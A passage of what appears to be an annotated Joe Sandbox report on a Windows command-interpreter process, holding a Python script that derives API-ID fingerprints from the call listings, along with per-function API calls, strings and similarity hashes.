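CALL_RE = re.compile(r"^\s*•\s*(?:Part of subcall function [0-9A-Fa-f]+:\s*)?([^\s.]+)\.", re.M)
TOKEN_RE = re.compile(r"[A-Z][a-z0-9]*|[a-z_][a-z0-9_]*")


def parse_listing(text):
    """Return the API names referenced by a listing, subcall entries included."""
    return CALL_RE.findall(text)


def tokens(name):
    """Split one API name into the words the fingerprint counts (inferred rule)."""
    if name.startswith("?"):  # mangled C++ symbol (here operator delete[]): not fingerprinted
        return []
    for prefix in ("Get", "Set"):
        if name.startswith(prefix) and len(name) > len(prefix) and name[len(prefix)].isupper():
            name = name[len(prefix):]
            break
    if len(name) > 1 and name.endswith("W") and name[-2].islower():  # wide-char suffix
        name = name[:-1]
    return TOKEN_RE.findall(name)  # CamelCase words; lowercase CRT names stay whole


def api_id(names):
    """Word multiset -> 'group$group$...': groups by descending count, ASCII-sorted inside."""
    counts = Counter(tok for name in names for tok in tokens(name))
    ordered = sorted(counts.items(), key=lambda kv: (-kv[1], kv[0]))
    groups = ["".join(tok for tok, _ in grp) for _, grp in groupby(ordered, key=lambda kv: kv[1])]
    return "$".join(groups)


def token_similarity(names_a, names_b):
    """Jaccard similarity of the two word multisets (a plain comparison, not the sandbox's metric)."""
    a = Counter(tok for n in names_a for tok in tokens(n))
    b = Counter(tok for n in names_b for tok in tokens(n))
    inter = sum((a & b).values())
    union = sum((a | b).values())
    return inter / union if union else 0.0


if __name__ == "__main__":
    for label, listing in (("COPYCMD function", LISTING_COPYCMD), ("heap function", LISTING_HEAP)):
        print(f"{label}: API ID = {api_id(parse_listing(listing))}")
    # Constructed input: one Enter/Leave pair reproduces the third record's API ID.
    print("constructed:", api_id(["EnterCriticalSection", "LeaveCriticalSection"]))
    print("token similarity:", token_similarity(parse_listing(LISTING_COPYCMD), parse_listing(LISTING_HEAP)))
```

Because the ID is built from word counts rather than from addresses or argument values, two functions that import the same APIs under different base addresses, or after a rebuild that shuffles call order, still share an ID, which is what makes it usable as a similarity key; the Opcode and Instruction fuzzy hashes above capture the code bytes themselves and change far more readily.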
APIs
• SetUnhandledExceptionFilter.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000,?,00EF6C76,00EE1000), ref: 00EF6B47
• UnhandledExceptionFilter.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(vl,?,00EF6C76,00EE1000), ref: 00EF6B50
• GetCurrentProcess.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0(C0000409,?,00EF6C76,00EE1000), ref: 00EF6B5B
• TerminateProcess.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0(00000000,?,00EF6C76,00EE1000), ref: 00EF6B62
Triage note (editor's addition, not part of the sandbox output): SetUnhandledExceptionFilter(0) followed by UnhandledExceptionFilter and TerminateProcess(GetCurrentProcess(), ...) with 0xC0000409 (STATUS_STACK_BUFFER_OVERRUN) on the stack is the MSVC runtime's /GS security-cookie failure handler, i.e. compiler-generated runtime code rather than sample-specific behaviour; on its own it is not evidence of anti-debugging or deliberate self-termination.
Strings
Memory Dump Source
• Source File: 00000007.00000002.1432672936.0000000000EE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EE0000, based on PE: true
• Associated: 00000007.00000002.1432651828.0000000000EE0000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000007.00000002.1432703439.0000000000F0E000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000007.00000002.1432728211.0000000000F2A000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000007.00000002.1432728211.0000000000F2E000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_ee0000_alpha.jbxd
Similarity
                                                                                                                                                                                                                                                                                                                                                      • API ID: ExceptionFilterProcessUnhandled$CurrentTerminate
                                                                                                                                                                                                                                                                                                                                                      • String ID: vl
                                                                                                                                                                                                                                                                                                                                                      • API String ID: 3231755760-3044229138
                                                                                                                                                                                                                                                                                                                                                      • Opcode ID: 8d9e489088cb555ba73e9a910507fdaeb0984967b35d27b3bade0f20d07ae468
                                                                                                                                                                                                                                                                                                                                                      • Instruction ID: a2337f6a919988f4bc76ec21c384e82cc83699b800f70e839e74552172269dab
                                                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 8d9e489088cb555ba73e9a910507fdaeb0984967b35d27b3bade0f20d07ae468
                                                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: CED0127204010CFFCB202BE1EC0CA493F28EB44352F004040F30DC2061CB364417AB6B
                                                                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 00EEDCD0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000008,?,?,00EEACD8,00000001,?,00000000,00EE8C23,-00000105,00F0C9B0,00000240,00EF1E92,00000000,00000000,00EFACE0,00000000), ref: 00EEDCE1
                                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 00EEDCD0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,00EEACD8,00000001,?,00000000,00EE8C23,-00000105,00F0C9B0,00000240,00EF1E92,00000000,00000000,00EFACE0,00000000,00000000), ref: 00EEDCE8
                                                                                                                                                                                                                                                                                                                                                      • wcstol.MSVCRT ref: 00EF08D9
                                                                                                                                                                                                                                                                                                                                                      • wcstol.MSVCRT ref: 00EF08F3
                                                                                                                                                                                                                                                                                                                                                      • wcstol.MSVCRT ref: 00EF090B
                                                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                      • Source File: 00000007.00000002.1432672936.0000000000EE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432651828.0000000000EE0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432703439.0000000000F0E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432728211.0000000000F2A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432728211.0000000000F2E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_ee0000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                                                      • API ID: wcstol$Heap$AllocProcess
                                                                                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                                                                                      • API String ID: 2343214347-0
                                                                                                                                                                                                                                                                                                                                                      • Opcode ID: 51941a31f515dbf34b3e27932960b3d767218a29edd9246c749bf6957b863c7a
                                                                                                                                                                                                                                                                                                                                                      • Instruction ID: 729602f75c74eaa2e5c7efaa973ec15f30e853b23d3631adadbe02d0fcb7190a
                                                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 51941a31f515dbf34b3e27932960b3d767218a29edd9246c749bf6957b863c7a
                                                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: FEA18270A0025D8BDB28DFA5CC555BEB7F6EF84304B14A02DEA01E7392EB70AC41DB91
                                                                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 00EEDCD0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000008,?,?,00EEACD8,00000001,?,00000000,00EE8C23,-00000105,00F0C9B0,00000240,00EF1E92,00000000,00000000,00EFACE0,00000000), ref: 00EEDCE1
                                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 00EEDCD0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,00EEACD8,00000001,?,00000000,00EE8C23,-00000105,00F0C9B0,00000240,00EF1E92,00000000,00000000,00EFACE0,00000000,00000000), ref: 00EEDCE8
                                                                                                                                                                                                                                                                                                                                                      • _pipe.MSVCRT ref: 00EE6B4F
                                                                                                                                                                                                                                                                                                                                                      • _get_osfhandle.MSVCRT ref: 00EE6BF7
                                                                                                                                                                                                                                                                                                                                                      • DuplicateHandle.API-MS-WIN-CORE-HANDLE-L1-1-0(00000000), ref: 00EE6C05
                                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 00EEE950: memset.MSVCRT ref: 00EEE9A0
                                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 00EEE950: wcschr.MSVCRT ref: 00EEE9FC
                                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 00EEE950: wcschr.MSVCRT ref: 00EEEA14
                                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 00EEE950: _wcsicmp.MSVCRT ref: 00EEEA80
                                                                                                                                                                                                                                                                                                                                                      • ??_V@YAXPAX@Z.MSVCRT(?), ref: 00EE6D8F
                                                                                                                                                                                                                                                                                                                                                      • longjmp.MSVCRT(00F20A30,00000001), ref: 00EFA6D8
                                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 00EEA1A8: _dup.MSVCRT ref: 00EEA1AF
                                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 00EEA1D6: _dup2.MSVCRT ref: 00EEA1EA
                                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 00EEA16C: _close.MSVCRT ref: 00EEA19B
                                                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                      • Source File: 00000007.00000002.1432672936.0000000000EE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432651828.0000000000EE0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432703439.0000000000F0E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432728211.0000000000F2A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432728211.0000000000F2E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_ee0000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                                                      • API ID: Heapwcschr$AllocDuplicateHandleProcess_close_dup_dup2_get_osfhandle_pipe_wcsicmplongjmpmemset
                                                                                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                                                                                      • API String ID: 1441200171-0
                                                                                                                                                                                                                                                                                                                                                      • Opcode ID: a55918a776136e47f7242d748c77fa8c52dfacd84a682fee549364618c72a014
                                                                                                                                                                                                                                                                                                                                                      • Instruction ID: 0b81aee450d50edbab66d36ee109de8cd755919a87a43476a2dd7b4af5c82576
                                                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: a55918a776136e47f7242d748c77fa8c52dfacd84a682fee549364618c72a014
                                                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 7491F5716002488FDB24EF25DC86A7AB7E1EB84364F19952DF56AE7291DB30EC01DB41
                                                                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                                                                      • IsDebuggerPresent.API-MS-WIN-CORE-DEBUG-L1-1-0(?,?,00F02FDD), ref: 00F02E5D
                                                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                      • Source File: 00000007.00000002.1432672936.0000000000EE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432651828.0000000000EE0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432703439.0000000000F0E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432728211.0000000000F2A000.00000002.00000001.01000000.00000006.sdmpDownload File
• Associated: 00000007.00000002.1432728211.0000000000F2E000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_ee0000_alpha.jbxd
Similarity
• API ID: DebuggerPresent
• String ID:
• API String ID: 1347740429-0
• Opcode ID: cafcbf6b338250b4b85272d05671f93b45d0c8161a5ae03008a8c5dffb2a9322
• Instruction ID: 729fd9d3c6dccc069cf84099899eb88755cff1baeb96fff13d1ec6ea87392ceb
• Opcode Fuzzy Hash: cafcbf6b338250b4b85272d05671f93b45d0c8161a5ae03008a8c5dffb2a9322
• Instruction Fuzzy Hash: 4CE0C231FC62399BDB715B64EC9C3B9368C2B11BA0F440466E425CB1D1C794DC06BBB0
APIs
• InitializeProcThreadAttributeList.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0(?,00000001,00000000,00000020,00F0C9D0,00000108,00EF2107,?,00000000,00000000,00000000), ref: 00EE94AA
• UpdateProcThreadAttribute.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0(?,00000000,00060001,?,00000004,00000000,00000000,?,00000000,00000000,00000000), ref: 00EE94D9
• memset.MSVCRT ref: 00EE94F1
• memset.MSVCRT ref: 00EE954A
• GetStartupInfoW.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0(00000044), ref: 00EE955D
  • Part of subcall function 00EF1D90: _wcsnicmp.MSVCRT ref: 00EF1E14
• lstrcmpW.API-MS-WIN-CORE-STRING-OBSOLETE-L1-1-0(00000000,\XCOPY.EXE), ref: 00EE95B8
• CreateProcessW.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0(?,?,00000000,00000000,00000001,00080000,00000000,?,?,?), ref: 00EE9602
• CloseHandle.API-MS-WIN-CORE-HANDLE-L1-1-0(?), ref: 00EE9624
• GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,00000000,00000000,00000000), ref: 00EFBDF1
• GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,00000000,00000000,00000000), ref: 00EFBE0D
• DeleteProcThreadAttributeList.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0(?,?,00000000,00000000,00000000), ref: 00EFBE26
Strings
Memory Dump Source
• Source File: 00000007.00000002.1432672936.0000000000EE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EE0000, based on PE: true
• Associated: 00000007.00000002.1432651828.0000000000EE0000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000007.00000002.1432703439.0000000000F0E000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000007.00000002.1432728211.0000000000F2A000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000007.00000002.1432728211.0000000000F2E000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_ee0000_alpha.jbxd
Similarity
• API ID: AttributeProcThread$ErrorLastListmemset$CloseCreateDeleteHandleInfoInitializeProcessStartupUpdate_wcsnicmplstrcmp
• String ID: $%01C$%08X$=ExitCode$=ExitCodeAscii$COPYCMD$D$H$\XCOPY.EXE
• API String ID: 1449572041-3461277227
• Opcode ID: b18edb813cd6f931aef25c6f6e2eee51f071a5d64487949a35477fa1407e74da
• Instruction ID: 1bfeb301876c68201616c24dba3e67bcf1ce51dc4f8c227d21f9195f3de6bd63
• Opcode Fuzzy Hash: b18edb813cd6f931aef25c6f6e2eee51f071a5d64487949a35477fa1407e74da
• Instruction Fuzzy Hash: 36C19F71A0035D9FDB249F65CC45BFA77F8EB44304F1460AAE60AF6281EB708985DF62
APIs
• memset.MSVCRT ref: 00EE4781
  • Part of subcall function 00EEE3F0: memset.MSVCRT ref: 00EEE455
• _get_osfhandle.MSVCRT ref: 00EE47E4
• GetFileSize.API-MS-WIN-CORE-FILE-L1-1-0(00000000,-00000001), ref: 00EE47EC
• _get_osfhandle.MSVCRT ref: 00EE47FD
• SetFilePointer.API-MS-WIN-CORE-FILE-L1-1-0(00000000), ref: 00EE4805
  • Part of subcall function 00EEA16C: _close.MSVCRT ref: 00EEA19B
• _get_osfhandle.MSVCRT ref: 00EE4832
• ReadFile.API-MS-WIN-CORE-FILE-L1-1-0(00000000,-00000001), ref: 00EE483A
• ??_V@YAXPAX@Z.MSVCRT(?), ref: 00EE4871
• SearchPathW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(00000000,?,00000000,?,?,00000000,?,-00000001), ref: 00EF8120
• memmove.MSVCRT(?,?,?), ref: 00EF8191
• GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(000000F5,?,00000000,?,00000000), ref: 00EF8328
• WriteConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000), ref: 00EF832F
  • Part of subcall function 00EEDD98: _get_osfhandle.MSVCRT ref: 00EEDDA3
  • Part of subcall function 00EEDD98: GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(00000000,00EFC050), ref: 00EEDDAD
Strings
Memory Dump Source
• Source File: 00000007.00000002.1432672936.0000000000EE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EE0000, based on PE: true
• Associated: 00000007.00000002.1432651828.0000000000EE0000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000007.00000002.1432703439.0000000000F0E000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000007.00000002.1432728211.0000000000F2A000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000007.00000002.1432728211.0000000000F2E000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_ee0000_alpha.jbxd
Similarity
• API ID: File_get_osfhandle$memset$ConsoleHandlePathPointerReadSearchSizeTypeWrite_closememmove
• String ID: DPATH
• API String ID: 2545859659-2010427443
• Opcode ID: b5da1bba365330611ab52d0f670b0440b5cade2d76b05e7b3e3f493d2575764d
• Instruction ID: 45d8c4fd596414c4497e7ede6e3cae5911e1aa3cfa5ecc6f72785100fa083e8c
• Opcode Fuzzy Hash: b5da1bba365330611ab52d0f670b0440b5cade2d76b05e7b3e3f493d2575764d
• Instruction Fuzzy Hash: 1AF1E0716083499FD724CF20C944B7BB7E8FB88714F106A2EF699A7290DB70D905CB92
APIs
Strings
Memory Dump Source
• Source File: 00000007.00000002.1432672936.0000000000EE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EE0000, based on PE: true
• Associated: 00000007.00000002.1432651828.0000000000EE0000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000007.00000002.1432703439.0000000000F0E000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000007.00000002.1432728211.0000000000F2A000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000007.00000002.1432728211.0000000000F2E000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_ee0000_alpha.jbxd
Similarity
• API ID: _wcsicmp$iswspace
• String ID: =,;$FOR$FOR/?$IF/?$REM$REM/?
• API String ID: 759518647-875390083
APIs
Strings
Similarity
• API ID: iswdigit$iswspacewcschr$_setjmp3
• String ID: ()|&=,;"$=,;$@$Ungetting: '%s'
• API String ID: 684130364-3872429996
APIs
• GetEnvironmentVariableW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,00F0E590,00002000,?,00F28BF0,00000000,?,?,00EE8F0D), ref: 00EEEC51
• _wcsicmp.MSVCRT ref: 00EEEC77
• _wcsicmp.MSVCRT ref: 00EEEC8D
• _wcsicmp.MSVCRT ref: 00EEECA3
• _wcsicmp.MSVCRT ref: 00EEECB9
• _wcsicmp.MSVCRT ref: 00EEECCF
• _wcsicmp.MSVCRT ref: 00EEECE5
• _wcsicmp.MSVCRT ref: 00EEECF7
• _wcsicmp.MSVCRT ref: 00EEED0D
  • Part of subcall function 00EE9310: GetSystemTime.API-MS-WIN-CORE-SYSINFO-L1-1-0(?,00F0E590,?,00002000), ref: 00EE9342
  • Part of subcall function 00EE9310: SystemTimeToFileTime.API-MS-WIN-CORE-TIMEZONE-L1-1-0(?,?), ref: 00EE9356
  • Part of subcall function 00EE9310: FileTimeToLocalFileTime.API-MS-WIN-CORE-FILE-L1-1-0(?,?), ref: 00EE936A
  • Part of subcall function 00EE9310: FileTimeToSystemTime.API-MS-WIN-CORE-TIMEZONE-L1-1-0(?,?), ref: 00EE937E
Strings
Similarity
• API ID: _wcsicmp$Time$File$System$EnvironmentLocalVariable
• String ID: CMDCMDLINE$CMDEXTVERSION$DATE$ERRORLEVEL$HIGHESTNUMANODENUMBER$RANDOM$TIME
• API String ID: 2447294730-2301591722
APIs
• _wcsupr.MSVCRT ref: 00F09CC8
• LocalFree.API-MS-WIN-CORE-HEAP-L2-1-0(00000000,00000000,?), ref: 00F09D22
• GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(000000F5), ref: 00F09D2A
• GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000,?), ref: 00F09D3A
• SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000,?), ref: 00F09D50
• GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(000000F6), ref: 00F09D58
• GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000,?), ref: 00F09D68
• SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000,?), ref: 00F09D7C
• GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(000000F6), ref: 00F09DDB
• FlushConsoleInputBuffer.API-MS-WIN-CORE-CONSOLE-L2-1-0(00000000), ref: 00F09DE2
• GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(000000F6,00000001,?), ref: 00F09DF2
• towupper.MSVCRT ref: 00F09E13
  • Part of subcall function 00EEA16C: _close.MSVCRT ref: 00EEA19B
• wcschr.MSVCRT ref: 00F09E6A
• SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?), ref: 00F09E9B
• SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?), ref: 00F09EA9
  • Part of subcall function 00EEDD98: _get_osfhandle.MSVCRT ref: 00EEDDA3
  • Part of subcall function 00EEDD98: GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(00000000,00EFC050), ref: 00EEDDAD
Strings
                                                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                      • Source File: 00000007.00000002.1432672936.0000000000EE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432651828.0000000000EE0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432703439.0000000000F0E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432728211.0000000000F2A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432728211.0000000000F2E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_ee0000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                                                      • API ID: Console$Mode$Handle$BufferFileFlushFreeInputLocalType_close_get_osfhandle_wcsuprtowupperwcschr
                                                                                                                                                                                                                                                                                                                                                      • String ID: <noalias>$CMD.EXE
                                                                                                                                                                                                                                                                                                                                                      • API String ID: 2015057810-1690691951
                                                                                                                                                                                                                                                                                                                                                      • Opcode ID: 3b1a6b06f4c739e22c3f17de471a2688fb61cf282d7294fb4ab2ad95f10f4be6
                                                                                                                                                                                                                                                                                                                                                      • Instruction ID: 0086ac9e6222da7c204509e47a6a07318cf343eecb9ffea84b3fab8fddadc07b
                                                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 3b1a6b06f4c739e22c3f17de471a2688fb61cf282d7294fb4ab2ad95f10f4be6
                                                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 9281D272E042199BCB24DBB4DC45AEEBBB9AF45720F144119F802E71D2EAB19C02E761
APIs
  • Part of subcall function 00EE9A11: _get_osfhandle.MSVCRT ref: 00EE9A1C
  • Part of subcall function 00EE9A11: GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(00000000,00EE793A,00000104,?), ref: 00EE9A2B
  • Part of subcall function 00EE9A11: GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(000000F6,?,?,?,?,?,?,?,?,?,?,?,?,00EE7908,00002374,-00000001), ref: 00EE9A47
  • Part of subcall function 00EE9A11: AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(00F28E04,00000002,?,?,?,?,?,?,?,?,?,?,?,?,00EE7908,00002374), ref: 00EE9A56
  • Part of subcall function 00EE9A11: GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00EE7908,00002374), ref: 00EE9A61
  • Part of subcall function 00EE9A11: ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(00F28E04,?,?,?,?,?,?,?,?,?,?,?,?,00EE7908,00002374,-00000001), ref: 00EE9A6A
• _get_osfhandle.MSVCRT ref: 00EE7943
• GetConsoleScreenBufferInfo.API-MS-WIN-CORE-CONSOLE-L2-1-0(00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,00EE7908,00002374,-00000001), ref: 00EE7951
• WriteConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000,00F20AF0,000000A0,00000000,00000000,00000000,?,00000104,?), ref: 00EE79BE
• GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000,?,00000000,?,00000104,?), ref: 00EE7A1C
• GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00EE7A27
Memory Dump Source
• Source File: 00000007.00000002.1432672936.0000000000EE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EE0000, based on PE: true
• Associated: 00000007.00000002.1432651828.0000000000EE0000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000007.00000002.1432703439.0000000000F0E000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000007.00000002.1432728211.0000000000F2A000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000007.00000002.1432728211.0000000000F2E000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_ee0000_alpha.jbxd
Similarity
• API ID: Console$ErrorLastLockShared_get_osfhandle$AcquireBufferFileHandleInfoModeReleaseScreenTypeWrite
• String ID:
• API String ID: 2173784998-0
• Opcode ID: a1de027be732c181d8a37f65c04280a462b40391dd90b7374c0163ddd854d7f6
• Instruction ID: d7353466073eea2863cdac960231459e2d45948d360633435cb55e68ac01f7f1
• Opcode Fuzzy Hash: a1de027be732c181d8a37f65c04280a462b40391dd90b7374c0163ddd854d7f6
• Instruction Fuzzy Hash: 8771AE71A0421CEFCB24DFA5DC88ABEBBB9FF48301F15502AE906F6251EB748805DB51
APIs
• FormatMessageW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00001200,00000000,?,00000400,?,00000100,00000000,?,?,?), ref: 00F02931
• GetCurrentThreadId.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0(?,?), ref: 00F02998
Strings
Memory Dump Source
• Source File: 00000007.00000002.1432672936.0000000000EE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EE0000, based on PE: true
• Associated: 00000007.00000002.1432651828.0000000000EE0000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000007.00000002.1432703439.0000000000F0E000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000007.00000002.1432728211.0000000000F2A000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000007.00000002.1432728211.0000000000F2E000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_ee0000_alpha.jbxd
Similarity
• API ID: CurrentFormatMessageThread
• String ID: $%hs!%p: $%hs(%d) tid(%x) %08X %ws$%hs(%u)\%hs!%p: $(caller: %p) $CallContext:[%hs] $Exception$FailFast$LogHr$Msg:[%ws] $P3$ReturnHr$[%hs(%hs)]$[%hs]
• API String ID: 2411632146-2026947634
• Opcode ID: c58642854f7a967d60e587fbf1a2b88cf2eb77ec331b52134c782baf63d3aaf1
• Instruction ID: b606bb99697702dc5f244f4d4b4d867e84bad4de4326634329861e95eec780cb
• Opcode Fuzzy Hash: c58642854f7a967d60e587fbf1a2b88cf2eb77ec331b52134c782baf63d3aaf1
• Instruction Fuzzy Hash: 9251E171A00318ABDB319B7A8C4EE6BB7B8EF44704F00455DF566A21E1DA75DA80FB31
APIs
• CreateFileW.API-MS-WIN-CORE-FILE-L1-1-0(?,40000000,00EFB7DB,0000000C,00000004,00000080,00000000), ref: 00EF05FF
• _open_osfhandle.MSVCRT ref: 00EF0613
• _wcsicmp.MSVCRT ref: 00EF0663
